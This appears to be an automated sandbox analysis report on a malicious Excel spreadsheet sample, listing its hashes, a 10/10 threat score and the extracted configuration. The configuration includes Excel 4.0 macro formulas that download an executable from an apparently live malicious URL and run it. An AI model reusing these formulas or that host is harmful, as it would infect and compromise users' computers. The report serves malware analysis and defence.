General

  • Target

    c10db36f5a07bd13703226344b43cc1c_JaffaCakes118

  • Size

    106KB

  • MD5

    c10db36f5a07bd13703226344b43cc1c

  • SHA1

    e67cf3ac54881bb4791e903426c3161e50249339

  • SHA256

    c0381b65a09796156de7dfc69e48cd0d16d67a27ced3fd15bc0c86c8d0f97b75

  • SHA512

    c87b70bafa17afddc7cd57c203ef0f93b65223d091507ce509601cb786af19d4475750f65f25bdd0829ed5f86bd0895c13fefd24a89eda13c075ffcf308a7e1f

  • SSDEEP

    1536:nSyEBMOZoVhoy9kKpA6gLc1aeWLXri6m7wBGozFDCTIuYDFo6QzXGfOiLdvkQJY:NOcoy2KpMXrit74lzFOTIT9QGfOiu

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://toliku.com/qmzo.exe

Attributes
  • formulas

    =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://toliku.com/qmzo.exe","C:\ProgramData\cswzqQf.exe",0,0)
    =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\ProgramData\cswzqQf.exe",,0,0)
    =HALT()

Signatures

Files

  • c10db36f5a07bd13703226344b43cc1c_JaffaCakes118
    .xls windows office2003